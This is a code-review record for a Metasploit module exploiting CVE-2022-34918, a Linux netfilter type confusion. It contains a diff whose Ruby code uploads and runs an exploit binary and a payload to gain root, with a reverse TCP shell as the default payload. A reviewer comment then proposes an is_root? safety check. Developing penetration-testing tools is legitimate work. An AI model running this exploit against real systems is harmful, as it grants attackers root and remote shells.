modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb

```diff
@@ -0,0 +1,107 @@
+          A type confusion bug in nft_set_elem_init (leading to a buffer overflow)
+          could be used by a local attacker to escalate privileges.
+          The attacker can obtain root access, but must start with an unprivileged
+          user namespace to obtain CAP_NET_ADMIN access.
+          The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC
+          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates
+        ],
+        'DisclosureDate' => '2022-02-07', # YYYY-DD-MM. Public disclosure date
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64],
+        'SessionTypes' => %w[meterpreter shell],
+        'DefaultOptions' => {
+          'Payload' => 'linux/x64/shell_reverse_tcp',
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork' => true,
+          'WfsDelay' => 30
+        },
+        'Targets' => [['Auto', {}]],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes.
+          'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted.
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        },
+        'References' => [
+          ['CVE', '2022-34918'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'],
+          ['URL', 'https://ubuntu.com/security/CVE-2022-34918'],
+          ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'],
+          ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC']
+        ]
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp'])
+      ]
+    )
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def upload_exploit_binary
+    executable_name = rand_text_alphanumeric(5..10)
+    @executable_path = "#{base_dir}/#{executable_name}"
+    upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf'))
+    register_file_for_cleanup(@executable_path)
+  end
+
+  def upload_payload_binary
+    payload_name = rand_text_alphanumeric(5..10)
+    @payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx(@payload_path, generate_payload_exe)
+    register_file_for_cleanup(@payload_path)
+  end
+
+  def run_payload
+    info = cmd_exec(@executable_path, @payload_path)
+    info.each_line do |line|
+      print_status(line)
+    end
+    print_status('Payload executed! If it was successful, a session should have been created')
+  end
+
+  def exploit
+    fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir)
```

Comment:
Traditionally local root exploits include a `is_root?` safety switch.

Kernel exploits are inherently dangerous. There's (usually) no point re-running an exploit if you already have root privileges. Of course, running as root is still a valid use case (container escape), so an override is offered:

```ruby
    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end
```

The `ForceExploit` option is offered by the `AutoCheck` mixin. If you decide not to include a `check` method for some reason, the `ForceExploit` option will need to be registered manually.